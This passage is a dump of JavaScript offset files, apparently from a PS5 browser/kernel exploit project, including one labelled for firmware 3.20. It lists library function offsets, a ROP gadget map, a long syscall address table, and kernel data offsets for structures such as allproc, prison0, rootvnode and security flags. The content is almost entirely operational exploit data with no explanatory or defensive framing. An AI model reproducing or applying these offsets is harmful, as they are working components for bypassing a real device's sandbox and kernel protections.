8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D5B8, //check
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EEDB, //check
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A26823, //check
42 | "add rax, rdx" : 0x016D53B2, //check
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x33B80, // sys_exit
49 | 0x002: 0x34B30, // sys_fork
50 | 0x003: 0x32D50, // sys_read
51 | 0x004: 0x32CB0, // sys_write
52 | 0x005: 0x33350, // sys_open
53 | 0x006: 0x33980, // sys_close
54 | 0x007: 0x32570, // sys_wait4
55 | 0x00A: 0x34670, // sys_unlink
56 | 0x00C: 0x34000, // sys_chdir
57 | 0x00F: 0x33A00, // sys_chmod
58 | 0x014: 0x32ED0, // sys_getpid
59 | 0x017: 0x329D0, // sys_setuid
60 | 0x018: 0x33FE0, // sys_getuid
61 | 0x019: 0x33390, // sys_geteuid
62 | 0x01B: 0x33430, // sys_recvmsg
63 | 0x01C: 0x33660, // sys_sendmsg
64 | 0x01D: 0x341B0, // sys_recvfrom
65 | 0x01E: 0x328D0, // sys_accept
66 | 0x01F: 0x326F0, // sys_getpeername
67 | 0x020: 0x34810, // sys_getsockname
68 | 0x021: 0x34330, // sys_access
69 | 0x022: 0x344B0, // sys_chflags
70 | 0x023: 0x33E80, // sys_fchflags
71 | 0x024: 0x34D60, // sys_sync
72 | 0x025: 0x33330, // sys_kill
73 | 0x027: 0x32DD0, // sys_getppid
74 | 0x029: 0x34390, // sys_dup
75 | 0x02A: 0x32D20, // sys_pipe
76 | 0x02B: 0x349D0, // sys_getegid
77 | 0x02C: 0x34D20, // sys_profil
78 | 0x02F: 0x32870, // sys_getgid
79 | 0x031: 0x32850, // sys_getlogin
80 | 0x032: 0x340E0, // sys_setlogin
81 | 0x035: 0x32A90, // sys_sigaltstack
82 | 0x036: 0x32BF0, // sys_ioctl
83 | 0x037: 0x33EC0, // sys_reboot
84 | 0x038: 0x33DC0, // sys_revoke
85 | 0x03B: 0x340C0, // sys_execve
86 | 0x041: 0x33A60, // sys_msync
87 | 0x049: 0x33250, // sys_munmap
88 | 0x04A: 0x33FC0, // sys_mprotect
89 | 0x04B: 0x33140, // sys_madvise
90 | 0x04E: 0x33310, // sys_mincore
91 | 0x04F: 0x327D0, // sys_getgroups
92 | 0x050: 0x32D70, // sys_setgroups
93 | 0x053: 0x327B0, // sys_setitimer
94 | 0x056: 0x325D0, // sys_getitimer
95 | 0x059: 0x33E20, // sys_getdtablesize
96 | 0x05A: 0x34230, // sys_dup2
97 | 0x05C: 0x33860, // sys_fcntl
98 | 0x05D: 0x333B0, // sys_select
99 | 0x05F: 0x32810, // sys_fsync
100 | 0x060: 0x33740, // sys_setpriority
101 | 0x061: 0x32F90, // sys_socket
102 | 0x062: 0x34020, // sys_connect
103 | 0x063: 0x34990, // sys_netcontrol
104 | 0x064: 0x32590, // sys_getpriority
105 | 0x065: 0x345B0, // sys_netabort
106 | 0x066: 0x34930, // sys_netgetsockinfo
107 | 0x068: 0x34630, // sys_bind
108 | 0x069: 0x338A0, // sys_setsockopt
109 | 0x06A: 0x32B90, // sys_listen
110 | 0x071: 0x33BA0, // sys_socketex
111 | 0x072: 0x33570, // sys_socketclose
112 | 0x074: 0x34D40, // sys_gettimeofday
113 | 0x075: 0x34E20, // sys_getrusage
114 | 0x076: 0x32550, // sys_getsockopt
115 | 0x078: 0x337E0, // sys_readv
116 | 0x079: 0x33640, // sys_writev
117 | 0x07A: 0x34290, // sys_settimeofday
118 | 0x07C: 0x331D0, // sys_fchmod
119 | 0x07D: 0x33A40, // sys_netgetiflist
120 | 0x07E: 0x34910, // sys_setreuid
121 | 0x07F: 0x33530, // sys_setregid
122 | 0x080: 0x34490, // sys_rename
123 | 0x083: 0x334B0, // sys_flock
124 | 0x085: 0x34D80, // sys_sendto
125 | 0x086: 0x34BB0, // sys_shutdown
126 | 0x087: 0x33F40, // sys_socketpair
127 | 0x088: 0x33CE0, // sys_mkdir
128 | 0x089: 0x32F30, // sys_rmdir
129 | 0x08A: 0x32440, // sys_utimes
130 | 0x08C: 0x348D0, // sys_adjtime
131 | 0x08D: 0x33A20, // sys_kqueueex
132 | 0x093: 0x33C80, // sys_setsid
133 | 0x0A5: 0x32770, // sys_sysarch
134 | 0x0B6: 0x34710, // sys_setegid
135 | 0x0B7: 0x325B0, // sys_seteuid
136 | 0x0BC: 0x34770, // sys_stat
137 | 0x0BD: 0x34B70, // sys_fstat
138 | 0x0BE: 0x33550, // sys_lstat
139 | 0x0BF: 0x32C50, // sys_pathconf
140 | 0x0C0: 0x33F00, // sys_fpathconf
141 | 0x0C2: 0x33490, // sys_getrlimit
142 | 0x0C3: 0x33070, // sys_setrlimit
143 | 0x0C4: 0x34690, // sys_getdirentries
144 | 0x0CA: 0x34470, // sys___sysctl
145 | 0x0CB: 0x33B20, // sys_mlock
146 | 0x0CC: 0x34510, // sys_munlock
147 | 0x0CE: 0x32FD0, // sys_futimes
148 | 0x0D1: 0x335B0, // sys_poll
149 | 0x0E8: 0x32670, // sys_clock_gettime
150 | 0x0E9: 0x33AE0, // sys_clock_settime
151 | 0x0EA: 0x34AE0, // sys_clock_getres
152 | 0x0EB: 0x346B0, // sys_ktimer_create
153 | 0x0EC: 0x32E30, // sys_ktimer_delete
154 | 0x0ED: 0x34B90, // sys_ktimer_settime
155 | 0x0EE: 0x34040, // sys_ktimer_gettime
156 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34570, // sys_nanosleep
158 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
159 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
160 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
161 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x341D0, // sys_issetugid
163 | 0x110: 0x34970, // sys_getdents
164 | 0x121: 0x34080, // sys_preadv
165 | 0x122: 0x335D0, // sys_pwritev
166 | 0x136: 0x332D0, // sys_getsid
167 | 0x13B: 0x34790, // sys_aio_suspend
168 | 0x144: 0x32E50, // sys_mlockall
169 | 0x145: 0x34250, // sys_munlockall
170 | 0x147: 0x32F50, // sys_sched_setparam
171 | 0x148: 0x33BC0, // sys_sched_getparam
172 | 0x149: 0x32710, // sys_sched_setscheduler
173 | 0x14A: 0x33590, // sys_sched_getscheduler
174 | 0x14B: 0x333F0, // sys_sched_yield
175 | 0x14C: 0x32990, // sys_sched_get_priority_max
176 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
177 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
178 | 0x154: 0x324A0, // sys_sigprocmask
179 | 0x155: 0x324E0, // sys_sigsuspend
180 | 0x157: 0x343B0, // sys_sigpending
181 | 0x159: 0x344D0, // sys_sigtimedwait
182 | 0x15A: 0x34110, // sys_sigwaitinfo
183 | 0x16A: 0x346F0, // sys_kqueue
184 | 0x16B: 0x32950, // sys_kevent
185 | 0x17B: 0x328F0, // sys_mtypeprotect
186 | 0x188: 0x32A10, // sys_uuidgen
187 | 0x189: 0x34E60, // sys_sendfile
188 | 0x18D: 0x32EB0, // sys_fstatfs
189 | 0x190: 0x32A70, // sys_ksem_close
190 | 0x191: 0x33800, // sys_ksem_post
191 | 0x192: 0x340A0, // sys_ksem_wait
192 | 0x193: 0x34E40, // sys_ksem_trywait
193 | 0x194: 0x32BB0, // sys_ksem_init
194 | 0x195: 0x345D0, // sys_ksem_open
195 | 0x196: 0x342B0, // sys_ksem_unlink
196 | 0x197: 0x32A30, // sys_ksem_getvalue
197 | 0x198: 0x34270, // sys_ksem_destroy
198 | 0x1A0: 0x34750, // sys_sigaction
199 | 0x1A1: 0x343F0, // sys_sigreturn
200 | 0x1A5: 0x330D0, // sys_getcontext
201 | 0x1A6: 0x33E00, // sys_setcontext
202 | 0x1A7: 0x33F20, // sys_swapcontext
203 | 0x1AD: 0x33120, // sys_sigwait
204 | 0x1AE: 0x327F0, // sys_thr_create
205 | 0x1AF: 0x32B50, // sys_thr_exit
206 | 0x1B0: 0x334F0, // sys_thr_self
207 | 0x1B1: 0x32B70, // sys_thr_kill
208 | 0x1B9: 0x34190, // sys_ksem_timedwait
209 | 0x1BA: 0x324C0, // sys_thr_suspend
210 | 0x1BB: 0x32DF0, // sys_thr_wake
211 | 0x1BC: 0x33E60, // sys_kldunloadf
212 | 0x1C6: 0x34B50, // sys__umtx_op
213 | 0x1C7: 0x34890, // sys_thr_new
214 | 0x1C8: 0x347F0, // sys_sigqueue
215 | 0x1D0: 0x34150, // sys_thr_set_name
216 | 0x1D2: 0x33700, // sys_rtprio_thread
217 | 0x1DB: 0x32E90, // sys_pread
218 | 0x1DC: 0x33FA0, // sys_pwrite
219 | 0x1DD: 0x34870, // sys_mmap
220 | 0x1DE: 0x34370, // sys_lseek
221 | 0x1DF: 0x33410, // sys_truncate
222 | 0x1E0: 0x32E70, // sys_ftruncate
223 | 0x1E1: 0x32460, // sys_thr_kill2
224 | 0x1E2: 0x34DE0, // sys_shm_open
225 | 0x1E3: 0x34850, // sys_shm_unlink
226 | 0x1E6: 0x33090, // sys_cpuset_getid
227 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32830, // sys_openat
230 | 0x203: 0x33EE0, // sys___cap_rights_get
231 | 0x20A: 0x33920, // sys_pselect
232 | 0x214: 0x339E0, // sys_regmgr_call
233 | 0x215: 0x33760, // sys_jitshm_create
234 | 0x216: 0x33D40, // sys_jitshm_alias
235 | 0x217: 0x32C30, // sys_dl_get_list
236 | 0x218: 0x33A80, // sys_dl_get_info
237 | 0x21A: 0x339C0, // sys_evf_create
238 | 0x21B: 0x32E10, // sys_evf_delete
239 | 0x21C: 0x33D60, // sys_evf_open
240 | 0x21D: 0x33940, // sys_evf_close
241 | 0x21E: 0x33C00, // sys_evf_wait
242 | 0x21F: 0x343D0, // sys_evf_trywait
243 | 0x220: 0x33D80, // sys_evf_set
244 | 0x221: 0x342F0, // sys_evf_clear
245 | 0x222: 0x33100, // sys_evf_cancel
246 | 0x223: 0x33BE0, // sys_query_memory_protection
247 | 0x224: 0x334D0, // sys_batch_map
248 | 0x225: 0x336E0, // sys_osem_create
249 | 0x226: 0x326B0, // sys_osem_delete
250 | 0x227: 0x32630, // sys_osem_open
251 | 0x228: 0x34C30, // sys_osem_close
252 | 0x229: 0x33CC0, // sys_osem_wait
253 | 0x22A: 0x342D0, // sys_osem_trywait
254 | 0x22B: 0x33F60, // sys_osem_post
255 | 0x22C: 0x33840, // sys_osem_cancel
256 | 0x22D: 0x335F0, // sys_namedobj_create
257 | 0x22E: 0x332F0, // sys_namedobj_delete
258 | 0x22F: 0x34EC0, // sys_set_vm_container
259 | 0x230: 0x32DB0, // sys_debug_init
260 | 0x233: 0x33720, // sys_opmc_enable
261 | 0x234: 0x32790, // sys_opmc_disable
262 | 0x235: 0x337A0, // sys_opmc_set_ctl
263 | 0x236: 0x337C0, // sys_opmc_set_ctr
264 | 0x237: 0x34210, // sys_opmc_get_ctr
265 | 0x23C: 0x33030, // sys_virtual_query
266 | 0x249: 0x34650, // sys_is_in_sandbox
267 | 0x24A: 0x33210, // sys_dmem_container
268 | 0x24B: 0x33AC0, // sys_get_authinfo
269 | 0x24C: 0x32610, // sys_mname
270 | 0x24F: 0x32C10, // sys_dynlib_dlsym
271 | 0x250: 0x32F10, // sys_dynlib_get_list
272 | 0x251: 0x349B0, // sys_dynlib_get_info
273 | 0x252: 0x338C0, // sys_dynlib_load_prx
274 | 0x253: 0x328B0, // sys_dynlib_unload_prx
275 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
277 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32480, // sys_sandbox_path
279 | 0x259: 0x32FF0, // sys_mdbg_service
280 | 0x25A: 0x33680, // sys_randomized_path
281 | 0x25B: 0x344F0, // sys_rdup
282 | 0x25C: 0x32AF0, // sys_dl_get_metadata
283 | 0x25D: 0x33230, // sys_workaround8849
284 | 0x25E: 0x329F0, // sys_is_development_mode
285 | 0x25F: 0x33B60, // sys_get_self_auth_info
286 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
287 | 0x262: 0x34EA0, // sys_budget_get_ptype
288 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x34C10, // sys_get_proc_type_info
290 | 0x265: 0x32420, // sys_get_resident_count
291 | 0x267: 0x33780, // sys_get_resident_fmem_count
292 | 0x268: 0x34830, // sys_thr_get_name
293 | 0x269: 0x33E40, // sys_set_gpo
294 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32930, // sys_test_debug_rwmem
296 | 0x26C: 0x32A50, // sys_free_stack
297 | 0x26E: 0x32650, // sys_ipmimgr_call
298 | 0x26F: 0x33AA0, // sys_get_gpo
299 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
300 | 0x271: 0x34430, // sys_opmc_set_hw
301 | 0x272: 0x32F70, // sys_opmc_get_hw
302 | 0x273: 0x325F0, // sys_get_cpu_usage_all
303 | 0x274: 0x33C60, // sys_mmap_dmem
304 | 0x275: 0x33010, // sys_physhm_open
305 | 0x276: 0x33820, // sys_physhm_unlink
306 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
307 | 0x279: 0x332B0, // sys_thr_resume_ucontext
308 | 0x27A: 0x33270, // sys_thr_get_ucontext
309 | 0x27B: 0x33370, // sys_thr_set_ucontext
310 | 0x27C: 0x32FB0, // sys_set_timezone_info
311 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
312 | 0x27E: 0x330B0, // sys_utc_to_localtime
313 | 0x27F: 0x34EE0, // sys_localtime_to_utc
314 | 0x280: 0x34060, // sys_set_uevt
315 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
316 | 0x282: 0x33450, // sys_get_map_statistics
317 | 0x283: 0x341F0, // sys_set_chicken_switches
318 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
319 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
320 | 0x288: 0x32690, // sys_app_state_change
321 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32730, // sys_process_terminate
323 | 0x28D: 0x32EF0, // sys_blockpool_open
324 | 0x28E: 0x32C90, // sys_blockpool_map
325 | 0x28F: 0x346D0, // sys_blockpool_unmap
326 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x333D0, // sys_blockpool_batch
328 | 0x292: 0x32B30, // sys_fdatasync
329 | 0x293: 0x33050, // sys_dynlib_get_list2
330 | 0x294: 0x34DA0, // sys_dynlib_get_info2
331 | 0x295: 0x34550, // sys_aio_submit
332 | 0x296: 0x32AD0, // sys_aio_multi_delete
333 | 0x297: 0x33900, // sys_aio_multi_wait
334 | 0x298: 0x329B0, // sys_aio_multi_poll
335 | 0x299: 0x34450, // sys_aio_get_data
336 | 0x29A: 0x338E0, // sys_aio_multi_cancel
337 | 0x29B: 0x32890, // sys_get_bio_usage_all
338 | 0x29C: 0x33F80, // sys_aio_create
339 | 0x29D: 0x349F0, // sys_aio_submit_cmd
340 | 0x29E: 0x348F0, // sys_aio_init
341 | 0x29F: 0x34350, // sys_get_page_table_stats
342 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x34950, // sys_blockpool_move
344 | 0x2A2: 0x347D0, // sys_virtual_query_all
345 | 0x2A3: 0x33880, // sys_reserve_2mb_page
346 | 0x2A4: 0x34130, // sys_cpumode_yield
347 | 0x2A5: 0x33C40, // sys_wait6
348 | 0x2A6: 0x336A0, // sys_cap_rights_limit
349 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
350 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
351 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32910, // sys_cap_fcntls_get
353 | 0x2AB: 0x34C70, // sys_bindat
354 | 0x2AC: 0x33470, // sys_connectat
355 | 0x2AD: 0x326D0, // sys_chflagsat
356 | 0x2AE: 0x32520, // sys_accept4
357 | 0x2AF: 0x32B10, // sys_pipe2
358 | 0x2B0: 0x33510, // sys_aio_mlock
359 | 0x2B1: 0x34BF0, // sys_procctl
360 | 0x2B2: 0x33EA0, // sys_ppoll
361 | 0x2B3: 0x33DE0, // sys_futimens
362 | 0x2B4: 0x34590, // sys_utimensat
363 | 0x2B5: 0x33B00, // sys_numa_getaffinity
364 | 0x2B6: 0x33960, // sys_numa_setaffinity
365 | 0x2C1: 0x32970, // sys_get_phys_page_size
366 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x331B0, // sys_openintr
368 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
369 | 0x2CE: 0x33290, // sys_acinfo_add
370 | 0x2CF: 0x32500, // sys_acinfo_delete
371 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32750, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x7062;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x317062;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE7062;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.20.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D658,
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EF7B,
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A269F3,
42 | "add rax, rdx" : 0x016D5582,
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x33B80, // sys_exit
49 | 0x002: 0x34B30, // sys_fork
50 | 0x003: 0x32D50, // sys_read
51 | 0x004: 0x32CB0, // sys_write
52 | 0x005: 0x33350, // sys_open
53 | 0x006: 0x33980, // sys_close
54 | 0x007: 0x32570, // sys_wait4
55 | 0x00A: 0x34670, // sys_unlink
56 | 0x00C: 0x34000, // sys_chdir
57 | 0x00F: 0x33A00, // sys_chmod
58 | 0x014: 0x32ED0, // sys_getpid
59 | 0x017: 0x329D0, // sys_setuid
60 | 0x018: 0x33FE0, // sys_getuid
61 | 0x019: 0x33390, // sys_geteuid
62 | 0x01B: 0x33430, // sys_recvmsg
63 | 0x01C: 0x33660, // sys_sendmsg
64 | 0x01D: 0x341B0, // sys_recvfrom
65 | 0x01E: 0x328D0, // sys_accept
66 | 0x01F: 0x326F0, // sys_getpeername
67 | 0x020: 0x34810, // sys_getsockname
68 | 0x021: 0x34330, // sys_access
69 | 0x022: 0x344B0, // sys_chflags
70 | 0x023: 0x33E80, // sys_fchflags
71 | 0x024: 0x34D60, // sys_sync
72 | 0x025: 0x33330, // sys_kill
73 | 0x027: 0x32DD0, // sys_getppid
74 | 0x029: 0x34390, // sys_dup
75 | 0x02A: 0x32D20, // sys_pipe
76 | 0x02B: 0x349D0, // sys_getegid
77 | 0x02C: 0x34D20, // sys_profil
78 | 0x02F: 0x32870, // sys_getgid
79 | 0x031: 0x32850, // sys_getlogin
80 | 0x032: 0x340E0, // sys_setlogin
81 | 0x035: 0x32A90, // sys_sigaltstack
82 | 0x036: 0x32BF0, // sys_ioctl
83 | 0x037: 0x33EC0, // sys_reboot
84 | 0x038: 0x33DC0, // sys_revoke
85 | 0x03B: 0x340C0, // sys_execve
86 | 0x041: 0x33A60, // sys_msync
87 | 0x049: 0x33250, // sys_munmap
88 | 0x04A: 0x33FC0, // sys_mprotect
89 | 0x04B: 0x33140, // sys_madvise
90 | 0x04E: 0x33310, // sys_mincore
91 | 0x04F: 0x327D0, // sys_getgroups
92 | 0x050: 0x32D70, // sys_setgroups
93 | 0x053: 0x327B0, // sys_setitimer
94 | 0x056: 0x325D0, // sys_getitimer
95 | 0x059: 0x33E20, // sys_getdtablesize
96 | 0x05A: 0x34230, // sys_dup2
97 | 0x05C: 0x33860, // sys_fcntl
98 | 0x05D: 0x333B0, // sys_select
99 | 0x05F: 0x32810, // sys_fsync
100 | 0x060: 0x33740, // sys_setpriority
101 | 0x061: 0x32F90, // sys_socket
102 | 0x062: 0x34020, // sys_connect
103 | 0x063: 0x34990, // sys_netcontrol
104 | 0x064: 0x32590, // sys_getpriority
105 | 0x065: 0x345B0, // sys_netabort
106 | 0x066: 0x34930, // sys_netgetsockinfo
107 | 0x068: 0x34630, // sys_bind
108 | 0x069: 0x338A0, // sys_setsockopt
109 | 0x06A: 0x32B90, // sys_listen
110 | 0x071: 0x33BA0, // sys_socketex
111 | 0x072: 0x33570, // sys_socketclose
112 | 0x074: 0x34D40, // sys_gettimeofday
113 | 0x075: 0x34E20, // sys_getrusage
114 | 0x076: 0x32550, // sys_getsockopt
115 | 0x078: 0x337E0, // sys_readv
116 | 0x079: 0x33640, // sys_writev
117 | 0x07A: 0x34290, // sys_settimeofday
118 | 0x07C: 0x331D0, // sys_fchmod
119 | 0x07D: 0x33A40, // sys_netgetiflist
120 | 0x07E: 0x34910, // sys_setreuid
121 | 0x07F: 0x33530, // sys_setregid
122 | 0x080: 0x34490, // sys_rename
123 | 0x083: 0x334B0, // sys_flock
124 | 0x085: 0x34D80, // sys_sendto
125 | 0x086: 0x34BB0, // sys_shutdown
126 | 0x087: 0x33F40, // sys_socketpair
127 | 0x088: 0x33CE0, // sys_mkdir
128 | 0x089: 0x32F30, // sys_rmdir
129 | 0x08A: 0x32440, // sys_utimes
130 | 0x08C: 0x348D0, // sys_adjtime
131 | 0x08D: 0x33A20, // sys_kqueueex
132 | 0x093: 0x33C80, // sys_setsid
133 | 0x0A5: 0x32770, // sys_sysarch
134 | 0x0B6: 0x34710, // sys_setegid
135 | 0x0B7: 0x325B0, // sys_seteuid
136 | 0x0BC: 0x34770, // sys_stat
137 | 0x0BD: 0x34B70, // sys_fstat
138 | 0x0BE: 0x33550, // sys_lstat
139 | 0x0BF: 0x32C50, // sys_pathconf
140 | 0x0C0: 0x33F00, // sys_fpathconf
141 | 0x0C2: 0x33490, // sys_getrlimit
142 | 0x0C3: 0x33070, // sys_setrlimit
143 | 0x0C4: 0x34690, // sys_getdirentries
144 | 0x0CA: 0x34470, // sys___sysctl
145 | 0x0CB: 0x33B20, // sys_mlock
146 | 0x0CC: 0x34510, // sys_munlock
147 | 0x0CE: 0x32FD0, // sys_futimes
148 | 0x0D1: 0x335B0, // sys_poll
149 | 0x0E8: 0x32670, // sys_clock_gettime
150 | 0x0E9: 0x33AE0, // sys_clock_settime
151 | 0x0EA: 0x34AE0, // sys_clock_getres
152 | 0x0EB: 0x346B0, // sys_ktimer_create
153 | 0x0EC: 0x32E30, // sys_ktimer_delete
154 | 0x0ED: 0x34B90, // sys_ktimer_settime
155 | 0x0EE: 0x34040, // sys_ktimer_gettime
156 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34570, // sys_nanosleep
158 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
159 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
160 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
161 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x341D0, // sys_issetugid
163 | 0x110: 0x34970, // sys_getdents
164 | 0x121: 0x34080, // sys_preadv
165 | 0x122: 0x335D0, // sys_pwritev
166 | 0x136: 0x332D0, // sys_getsid
167 | 0x13B: 0x34790, // sys_aio_suspend
168 | 0x144: 0x32E50, // sys_mlockall
169 | 0x145: 0x34250, // sys_munlockall
170 | 0x147: 0x32F50, // sys_sched_setparam
171 | 0x148: 0x33BC0, // sys_sched_getparam
172 | 0x149: 0x32710, // sys_sched_setscheduler
173 | 0x14A: 0x33590, // sys_sched_getscheduler
174 | 0x14B: 0x333F0, // sys_sched_yield
175 | 0x14C: 0x32990, // sys_sched_get_priority_max
176 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
177 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
178 | 0x154: 0x324A0, // sys_sigprocmask
179 | 0x155: 0x324E0, // sys_sigsuspend
180 | 0x157: 0x343B0, // sys_sigpending
181 | 0x159: 0x344D0, // sys_sigtimedwait
182 | 0x15A: 0x34110, // sys_sigwaitinfo
183 | 0x16A: 0x346F0, // sys_kqueue
184 | 0x16B: 0x32950, // sys_kevent
185 | 0x17B: 0x328F0, // sys_mtypeprotect
186 | 0x188: 0x32A10, // sys_uuidgen
187 | 0x189: 0x34E60, // sys_sendfile
188 | 0x18D: 0x32EB0, // sys_fstatfs
189 | 0x190: 0x32A70, // sys_ksem_close
190 | 0x191: 0x33800, // sys_ksem_post
191 | 0x192: 0x340A0, // sys_ksem_wait
192 | 0x193: 0x34E40, // sys_ksem_trywait
193 | 0x194: 0x32BB0, // sys_ksem_init
194 | 0x195: 0x345D0, // sys_ksem_open
195 | 0x196: 0x342B0, // sys_ksem_unlink
196 | 0x197: 0x32A30, // sys_ksem_getvalue
197 | 0x198: 0x34270, // sys_ksem_destroy
198 | 0x1A0: 0x34750, // sys_sigaction
199 | 0x1A1: 0x343F0, // sys_sigreturn
200 | 0x1A5: 0x330D0, // sys_getcontext
201 | 0x1A6: 0x33E00, // sys_setcontext
202 | 0x1A7: 0x33F20, // sys_swapcontext
203 | 0x1AD: 0x33120, // sys_sigwait
204 | 0x1AE: 0x327F0, // sys_thr_create
205 | 0x1AF: 0x32B50, // sys_thr_exit
206 | 0x1B0: 0x334F0, // sys_thr_self
207 | 0x1B1: 0x32B70, // sys_thr_kill
208 | 0x1B9: 0x34190, // sys_ksem_timedwait
209 | 0x1BA: 0x324C0, // sys_thr_suspend
210 | 0x1BB: 0x32DF0, // sys_thr_wake
211 | 0x1BC: 0x33E60, // sys_kldunloadf
212 | 0x1C6: 0x34B50, // sys__umtx_op
213 | 0x1C7: 0x34890, // sys_thr_new
214 | 0x1C8: 0x347F0, // sys_sigqueue
215 | 0x1D0: 0x34150, // sys_thr_set_name
216 | 0x1D2: 0x33700, // sys_rtprio_thread
217 | 0x1DB: 0x32E90, // sys_pread
218 | 0x1DC: 0x33FA0, // sys_pwrite
219 | 0x1DD: 0x34870, // sys_mmap
220 | 0x1DE: 0x34370, // sys_lseek
